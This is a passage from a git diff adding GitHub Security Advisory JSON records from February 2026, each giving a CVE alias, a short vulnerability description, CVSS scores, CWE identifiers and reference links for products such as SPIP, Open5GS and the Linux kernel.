--- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rm24-2x6v-8w7f/GHSA-rm24-2x6v-8w7f.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rm24-2x6v-8w7f", + "modified": "2026-02-17T21:31:15Z", + "published": "2026-02-17T21:31:15Z", + "aliases": [ + "CVE-2026-2622" + ], + "details": "A vulnerability was detected in Blossom up to 1.17.1. This vulnerability affects the function content of the file blossom-backend/backend/src/main/java/com/blossom/backend/server/article/draft/ArticleController.java of the component Article Title Handler. The manipulation results in cross site scripting. The attack can be launched remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2622" + }, + { + "type": "WEB", + "url": "https://fx4tqqfvdw4.feishu.cn/docx/AXa1dpliBomr2Ox6dYJc6jJInEb" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.346273" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.346273" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.751987" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-17T21:22:16Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rm73-jpvr-q26q/GHSA-rm73-jpvr-q26q.json b/advisories/unreviewed/2026/02/GHSA-rm73-jpvr-q26q/GHSA-rm73-jpvr-q26q.json new file mode 100644 index 0000000000000..b1e3f673e9fbd --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rm73-jpvr-q26q/GHSA-rm73-jpvr-q26q.json @@ -0,0 +1,41 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rm73-jpvr-q26q", + "modified": "2026-02-14T18:30:15Z", + "published": "2026-02-14T18:30:15Z", + "aliases": [ + "CVE-2025-71204" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nsmb/server: fix refcount leak in parse_durable_handle_context()\n\nWhen the command is a replay operation and -ENOEXEC is returned,\nthe refcount of ksmbd_file must be released.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-71204" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/07df5ff4f6490a5c96715b7c562e0b2908422e04" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/3296c3012a9d9a27e81e34910384e55a6ff3cff0" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/70dd3513ed6ac8c6cab23f72c5b19f44ca89de9d" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/8a15107c4c031fb19737bf2eb4000f847f1d5e4c" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-14T17:15:54Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rm7q-jj78-qfc9/GHSA-rm7q-jj78-qfc9.json b/advisories/unreviewed/2026/02/GHSA-rm7q-jj78-qfc9/GHSA-rm7q-jj78-qfc9.json index 5518cee284a70..f63e5d8167a4d 100644 --- a/advisories/unreviewed/2026/02/GHSA-rm7q-jj78-qfc9/GHSA-rm7q-jj78-qfc9.json +++ b/advisories/unreviewed/2026/02/GHSA-rm7q-jj78-qfc9/GHSA-rm7q-jj78-qfc9.json @@ -46,7 +46,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-77" + "CWE-77", + "CWE-78" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-rmgp-99fm-wv32/GHSA-rmgp-99fm-wv32.json b/advisories/unreviewed/2026/02/GHSA-rmgp-99fm-wv32/GHSA-rmgp-99fm-wv32.json new file mode 100644 index 0000000000000..df82f7579b660 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rmgp-99fm-wv32/GHSA-rmgp-99fm-wv32.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rmgp-99fm-wv32", + "modified": "2026-02-12T18:30:23Z", + "published": "2026-02-12T12:31:00Z", + "aliases": [ + "CVE-2025-15574" + ], + "details": "When connecting to the Solax Cloud MQTT server the username is the \"registration number\", which is the 10 character string printed on the SolaX Power Pocket device / the QR code on the device. The password is derived from the \"registration number\" using a proprietary XOR/transposition algorithm. Attackers with the knowledge of the registration numbers can connect to the MQTT server and impersonate the dongle / inverters.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-15574" + }, + { + "type": "WEB", + "url": "https://r.sec-consult.com/solax" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-330" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T11:15:49Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rp48-fq7w-35g6/GHSA-rp48-fq7w-35g6.json b/advisories/unreviewed/2026/02/GHSA-rp48-fq7w-35g6/GHSA-rp48-fq7w-35g6.json new file mode 100644 index 0000000000000..59d9ffad4acd0 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rp48-fq7w-35g6/GHSA-rp48-fq7w-35g6.json @@ -0,0 +1,37 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rp48-fq7w-35g6", + "modified": "2026-02-14T15:32:19Z", + "published": "2026-02-14T15:32:19Z", + "aliases": [ + "CVE-2026-23129" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\ndpll: Prevent duplicate registrations\n\nModify the internal registration helpers dpll_xa_ref_{dpll,pin}_add()\nto reject duplicate registration attempts.\n\nPreviously, if a caller attempted to register the same pin multiple\ntimes (with the same ops, priv, and cookie) on the same device, the core\nsilently increments the reference count and return success. This behavior\nis incorrect because if the caller makes these duplicate registrations\nthen for the first one dpll_pin_registration is allocated and for others\nthe associated dpll_pin_ref.refcount is incremented. During the first\nunregistration the associated dpll_pin_registration is freed and for\nothers WARN is fired.\n\nFix this by updating the logic to return `-EEXIST` if a matching\nregistration is found to enforce a strict \"register once\" policy.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23129" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/236a657422a564859dcd0db7bdb486abb21a721a" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/dfec0501dba8f4711ef142a6a890e4812b7af88c" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/f3ddbaaaaf4d0633b40482f471753f9c71294a4a" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-14T15:16:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rp4q-m72m-rqhg/GHSA-rp4q-m72m-rqhg.json b/advisories/unreviewed/2026/02/GHSA-rp4q-m72m-rqhg/GHSA-rp4q-m72m-rqhg.json new file mode 100644 index 0000000000000..ddc76cde8b436 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rp4q-m72m-rqhg/GHSA-rp4q-m72m-rqhg.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rp4q-m72m-rqhg", + "modified": "2026-02-16T18:31:29Z", + "published": "2026-02-16T18:31:29Z", + "aliases": [ + "CVE-2019-25385" + ], + "details": "Smoothwall Express 3.1-SP4-polar-x86_64-update9 contains a reflected cross-site scripting vulnerability that allows attackers to inject malicious scripts by manipulating the MACHINE and MACHINECOMMENT parameters. Attackers can send POST requests to the outgoing.cgi endpoint with script payloads to execute arbitrary JavaScript in users' browsers and steal session data.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25385" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/46333" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/smoothwall-express-outgoingcgi-cross-site-scriptin" + }, + { + "type": "WEB", + "url": "http://www.smoothwall.org" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-16T18:19:42Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rpcc-624p-hfv6/GHSA-rpcc-624p-hfv6.json b/advisories/unreviewed/2026/02/GHSA-rpcc-624p-hfv6/GHSA-rpcc-624p-hfv6.json new file mode 100644 index 0000000000000..5972b1a5edcaf --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rpcc-624p-hfv6/GHSA-rpcc-624p-hfv6.json @@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rpcc-624p-hfv6", + "modified": "2026-02-15T15:31:31Z", + "published": "2026-02-15T15:31:31Z", + "aliases": [ + "CVE-2026-2517" + ], + "details": "A security flaw has been discovered in Open5GS up to 2.7.6. This vulnerability affects the function ogs_gtp2_parse_tft in the library lib/gtp/v2/types.c of the component SMF. Performing a manipulation of the argument pf[0].content.length results in denial of service. The attack is possible to be carried out remotely. The exploit has been released to the public and may be used for attacks. The project was informed of the problem early through an issue report but has not responded yet.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2517" + }, + { + "type": "WEB", + "url": "https://github.com/open5gs/open5gs/issues/4281" + }, + { + "type": "WEB", + "url": "https://github.com/open5gs/open5gs/issues/4281#issue-3807802287" + }, + { + "type": "WEB", + "url": "https://github.com/open5gs/open5gs" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.346108" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.346108" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.738332" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-404" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-15T13:16:16Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rpjf-2xrw-h2w5/GHSA-rpjf-2xrw-h2w5.json b/advisories/unreviewed/2026/02/GHSA-rpjf-2xrw-h2w5/GHSA-rpjf-2xrw-h2w5.json new file mode 100644 index 0000000000000..ec5ebbaaf64ca --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rpjf-2xrw-h2w5/GHSA-rpjf-2xrw-h2w5.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rpjf-2xrw-h2w5", + "modified": "2026-02-19T18:31:54Z", + "published": "2026-02-19T18:31:54Z", + "aliases": [ + "CVE-2025-71241" + ], + "details": "SPIP before 4.3.6, 4.2.17, and 4.1.20 allows Cross-Site Scripting (XSS) in the private area. The content of the error message displayed by the 'transmettre' API is not properly sanitized, allowing an attacker to inject malicious scripts. This vulnerability is mitigated by the SPIP security screen.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-71241" + }, + { + "type": "WEB", + "url": "https://blog.spip.net/Mise-a-jour-de-securite-sortie-de-SPIP-4-3-6-SPIP-4-2-17-SPIP-4-1-20.html" + }, + { + "type": "WEB", + "url": "https://git.spip.net/spip/spip" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/spip-cross-site-scripting-in-private-area" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T16:27:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rpq9-4jjf-2xhh/GHSA-rpq9-4jjf-2xhh.json b/advisories/unreviewed/2026/02/GHSA-rpq9-4jjf-2xhh/GHSA-rpq9-4jjf-2xhh.json new file mode 100644 index 0000000000000..fa4dee9cc9def --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rpq9-4jjf-2xhh/GHSA-rpq9-4jjf-2xhh.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rpq9-4jjf-2xhh", + "modified": "2026-02-19T00:30:29Z", + "published": "2026-02-19T00:30:29Z", + "aliases": [ + "CVE-2026-27176" + ], + "details": "MajorDoMo (aka Major Domestic Module) contains a reflected cross-site scripting (XSS) vulnerability in command.php. The $qry parameter is rendered directly into the HTML page without sanitization via htmlspecialchars(), both in an input field value attribute and in a paragraph element. An attacker can inject arbitrary JavaScript by crafting a URL with malicious content in the qry parameter.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27176" + }, + { + "type": "WEB", + "url": "https://github.com/sergejey/majordomo/pull/1177" + }, + { + "type": "WEB", + "url": "https://chocapikk.com/posts/2026/majordomo-revisited" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/majordomo-reflected-cross-site-scripting-in-commandphp" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T22:16:25Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rq5p-55rh-7hgc/GHSA-rq5p-55rh-7hgc.json b/advisories/unreviewed/2026/02/GHSA-rq5p-55rh-7hgc/GHSA-rq5p-55rh-7hgc.json new file mode 100644 index 0000000000000..f5670cee9ad5a --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rq5p-55rh-7hgc/GHSA-rq5p-55rh-7hgc.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rq5p-55rh-7hgc", + "modified": "2026-02-12T21:31:25Z", + "published": "2026-02-11T15:30:26Z", + "aliases": [ + "CVE-2025-62855" + ], + "details": "A path traversal vulnerability has been reported to affect File Station 5. If a local attacker gains an administrator account, they can then exploit the vulnerability to read the contents of unexpected files or system data.\n\nWe have already fixed the vulnerability in the following version:\nFile Station 5 5.5.6.5190 and later", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-62855" + }, + { + "type": "WEB", + "url": "https://www.qnap.com/en/security-advisory/qsa-26-03" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T13:15:57Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rqh7-4vgv-648p/GHSA-rqh7-4vgv-648p.json b/advisories/unreviewed/2026/02/GHSA-rqh7-4vgv-648p/GHSA-rqh7-4vgv-648p.json new file mode 100644 index 0000000000000..749b3d28601b8 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rqh7-4vgv-648p/GHSA-rqh7-4vgv-648p.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rqh7-4vgv-648p", + "modified": "2026-02-17T00:30:18Z", + "published": "2026-02-17T00:30:18Z", + "aliases": [ + "CVE-2025-12062" + ], + "details": "The WP Maps – Store Locator,Google Maps,OpenStreetMap,Mapbox,Listing,Directory & Filters plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 4.8.6 via the fc_load_template function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to include and execute arbitrary .html files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where .html file types can be uploaded and included.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-12062" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3405282" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/815e5b86-2d1b-4794-b761-dad770393d3e?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-17T00:16:17Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rqhx-7554-jmg8/GHSA-rqhx-7554-jmg8.json b/advisories/unreviewed/2026/02/GHSA-rqhx-7554-jmg8/GHSA-rqhx-7554-jmg8.json new file mode 100644 index 0000000000000..6e72a5a96eedd --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rqhx-7554-jmg8/GHSA-rqhx-7554-jmg8.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rqhx-7554-jmg8", + "modified": "2026-02-12T03:31:01Z", + "published": "2026-02-12T03:31:01Z", + "aliases": [ + "CVE-2026-23857" + ], + "details": "Dell Update Package (DUP) Framework, versions 23.12.00 through 24.12.00, contains an Improper Handling of Insufficient Permissions or Privileges vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to Elevation of privileges.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23857" + }, + { + "type": "WEB", + "url": "https://www.dell.com/support/kbdoc/en-us/000426781/dsa-2026-081-security-update-for-dell-update-package-dup-framework-vulnerability" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-280" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T03:15:47Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rr27-5cg7-jpp5/GHSA-rr27-5cg7-jpp5.json b/advisories/unreviewed/2026/02/GHSA-rr27-5cg7-jpp5/GHSA-rr27-5cg7-jpp5.json new file mode 100644 index 0000000000000..2345547e87bb8 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rr27-5cg7-jpp5/GHSA-rr27-5cg7-jpp5.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rr27-5cg7-jpp5", + "modified": "2026-02-13T00:32:51Z", + "published": "2026-02-11T21:30:40Z", + "aliases": [ + "CVE-2024-26478" + ], + "details": "An issue in Statping-ng v.0.91.0 allows an attacker to obtain sensitive information via a crafted request to the /api/users endpoint.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-26478" + }, + { + "type": "WEB", + "url": "https://github.com/Ev3rR3d/Statping_Poc" + }, + { + "type": "WEB", + "url": "https://github.com/Ev3rR3d/Statping_Poc/tree/main/CVE-2024-26478" + }, + { + "type": "WEB", + "url": "https://github.com/statping-ng/statping-ng" + }, + { + "type": "WEB", + "url": "https://statping-ng.github.io" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-200" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T20:16:06Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rrc9-5ccp-4p2x/GHSA-rrc9-5ccp-4p2x.json b/advisories/unreviewed/2026/02/GHSA-rrc9-5ccp-4p2x/GHSA-rrc9-5ccp-4p2x.json new file mode 100644 index 0000000000000..dd0c8f413d04f --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rrc9-5ccp-4p2x/GHSA-rrc9-5ccp-4p2x.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rrc9-5ccp-4p2x", + "modified": "2026-02-13T00:32:52Z", + "published": "2026-02-13T00:32:52Z", + "aliases": [ + "CVE-2019-25318" + ], + "details": "AVS Audio Converter 9.1.2.600 contains a stack overflow vulnerability that allows attackers to execute arbitrary code by manipulating the output folder text input. Attackers can craft a malicious payload that overwrites stack memory and triggers a bind shell on port 9999 when the 'Browse' button is clicked.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25318" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47788" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47810" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/avs-audio-converter-stack-overflow" + }, + { + "type": "WEB", + "url": "http://www.avs4you.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-121" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T23:16:02Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rrcr-4pq7-hrcc/GHSA-rrcr-4pq7-hrcc.json b/advisories/unreviewed/2026/02/GHSA-rrcr-4pq7-hrcc/GHSA-rrcr-4pq7-hrcc.json new file mode 100644 index 0000000000000..f634cf522ac90 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rrcr-4pq7-hrcc/GHSA-rrcr-4pq7-hrcc.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rrcr-4pq7-hrcc", + "modified": "2026-02-19T21:30:46Z", + "published": "2026-02-19T18:31:55Z", + "aliases": [ + "CVE-2026-23610" + ], + "details": "GFI MailEssentials AI versions prior to 22.4 contain a stored cross-site scripting vulnerability in the POP2Exchange configuration endpoint. An authenticated user can supply HTML/JavaScript in the POP3 server login field within the JSON \\\"popServers\\\" payload to /MailEssentials/pages/MailSecurity/POP2Exchange.aspx/Save, which is stored and later rendered in the management interface, allowing script execution in the context of a logged-in user.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23610" + }, + { + "type": "WEB", + "url": "https://gfi.ai/products-and-solutions/network-security-solutions/mailessentials/resources/documentation/product-releases" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/gfi-mailessentials-ai-pop2exchange-pop3-server-login-stored-xss" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T18:24:55Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rv75-v2gv-p54c/GHSA-rv75-v2gv-p54c.json b/advisories/unreviewed/2026/02/GHSA-rv75-v2gv-p54c/GHSA-rv75-v2gv-p54c.json new file mode 100644 index 0000000000000..da27a8ec09d4a --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rv75-v2gv-p54c/GHSA-rv75-v2gv-p54c.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rv75-v2gv-p54c", + "modified": "2026-02-18T15:31:25Z", + "published": "2026-02-18T15:31:25Z", + "aliases": [ + "CVE-2025-33239" + ], + "details": "NVIDIA Megatron Bridge contains a vulnerability in a data merging tutorial, where malicious input could cause a code injection. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, information disclosure, and data tampering.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-33239" + }, + { + "type": "WEB", + "url": "https://nvidia.custhelp.com/app/answers/detail/a_id/5781" + }, + { + "type": "WEB", + "url": "https://www.cve.org/CVERecord?id=CVE-2025-33239" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-94" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T14:16:02Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rvhp-mghq-8mvw/GHSA-rvhp-mghq-8mvw.json b/advisories/unreviewed/2026/02/GHSA-rvhp-mghq-8mvw/GHSA-rvhp-mghq-8mvw.json new file mode 100644 index 0000000000000..d660ca2f4621d --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rvhp-mghq-8mvw/GHSA-rvhp-mghq-8mvw.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rvhp-mghq-8mvw", + "modified": "2026-02-18T15:31:24Z", + "published": "2026-02-14T00:32:42Z", + "aliases": [ + "CVE-2025-70957" + ], + "details": "A Denial of Service (DoS) vulnerability was discovered in the TON Lite Server before v2024.09. The vulnerability arises from the handling of external arguments passed to locally executed \"get methods.\" An attacker can inject a constructed Continuation object (an internal TVM type) that is normally restricted within the VM. When the TVM executes this malicious continuation, it consumes excessive CPU resources while accruing disproportionately low virtual gas costs. This \"free\" computation allows an attacker 